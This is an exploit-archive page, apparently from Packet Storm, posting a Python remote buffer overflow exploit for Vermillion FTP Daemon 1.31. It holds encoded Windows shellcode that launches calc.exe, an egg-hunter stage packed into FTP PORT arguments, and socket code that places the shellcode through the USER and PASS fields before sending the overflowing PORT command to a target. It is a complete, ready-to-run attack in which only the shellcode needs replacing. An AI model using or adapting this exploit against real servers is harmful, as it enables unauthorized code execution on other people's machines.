what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Vermillion FTP Daemon Buffer Overflow

Vermillion FTP Daemon Buffer Overflow
Posted Jan 31, 2010
Authored by Dz_attacker

Vermillion FTP Daemon version 1.31 remote buffer overflow exploit that spawns calc.exe.

tags | exploit, remote, overflow
SHA-256 | 8cd7207fe0c17003da397f372225d80927a3889b3b21db5b248fcf42b2164597

Vermillion FTP Daemon Buffer Overflow

Change Mirror Download
#!/usr/bin/python

#[+] Original : http://www.global-evolution.info/news/files/vftpd/vftpd.txt

import socket
import sys
import time

if (len(sys.argv) != 2):
print "+++++++++++++++++++++++++++++++++++++++++++++++++"
print "[+] Vftpd Remote BOF Exploit"
print "[+] Exploit By Dz_attacker (dz_attacker@hotmail.fr)"
print "[+] Usage : %s <target_ip>" %sys.argv[0]
print "+++++++++++++++++++++++++++++++++++++++++++++++++\n"
sys.exit(0)



# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x5a\x32\x37\x44\x5a\x32\x37\x90\x90\x90\x90\x90\x90\x90\x90"
"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc1"
"\xbc\xec\x76\x83\xeb\xfc\xe2\xf4\x3d\x54\xa8\x76\xc1\xbc\x67\x33"
"\xfd\x37\x90\x73\xb9\xbd\x03\xfd\x8e\xa4\x67\x29\xe1\xbd\x07\x3f"
"\x4a\x88\x67\x77\x2f\x8d\x2c\xef\x6d\x38\x2c\x02\xc6\x7d\x26\x7b"
"\xc0\x7e\x07\x82\xfa\xe8\xc8\x72\xb4\x59\x67\x29\xe5\xbd\x07\x10"
"\x4a\xb0\xa7\xfd\x9e\xa0\xed\x9d\x4a\xa0\x67\x77\x2a\x35\xb0\x52"
"\xc5\x7f\xdd\xb6\xa5\x37\xac\x46\x44\x7c\x94\x7a\x4a\xfc\xe0\xfd"
"\xb1\xa0\x41\xfd\xa9\xb4\x07\x7f\x4a\x3c\x5c\x76\xc1\xbc\x67\x1e"
"\xfd\xe3\xdd\x80\xa1\xea\x65\x8e\x42\x7c\x97\x26\xa9\xc2\x34\x94"
"\xb2\xd4\x74\x88\x4b\xb2\xbb\x89\x26\xdf\x8d\x1a\xa2\xbc\xec\x76")

stage = "92060006,92080001,92120010,92150015,92000015,92040002,"
stage += "92050002,92060010,92000002,92050008,92120013,92020014,"
stage += "92030012,92000005,92050010,92070004,92140015,92110008,"
stage += "92040004,92050010,92030002,92030007,92080011,92150010,"
stage += "92100015,92070005,92140010,92100015,92070005,92140007,"
stage += "92150015,92140007,"

payload = shellcode + "\x44"*(500-len(shellcode))

buffer = "92040001,"*11
buffer += stage
buffer += "92020004,"
buffer += "92150011,"
buffer += "92010002,"
buffer += "92000000,"
buffer += "92020013,"
buffer += "92070000,"
buffer += "92040002,"
buffer += "92000000,"
buffer += "2"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],21))
print "[x] Sending Shellcode..."
s.recv(1024)
s.send('USER '+payload+'\r\n')
s.recv(1024)
s.send('PASS '+payload+'\r\n')
s.recv(1024)
s.send('SYST\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.recv(1024)
s.close()

time.sleep(2)

s2=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],21))
print "[x] Sending Exploit..."
s2.send('PORT '+buffer+'\r\n')
s2.close()
time.sleep(2)
print "[x] Hunting the shellcode..."
time.sleep(3)
raw_input("[x] Done, press enter to quit")
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close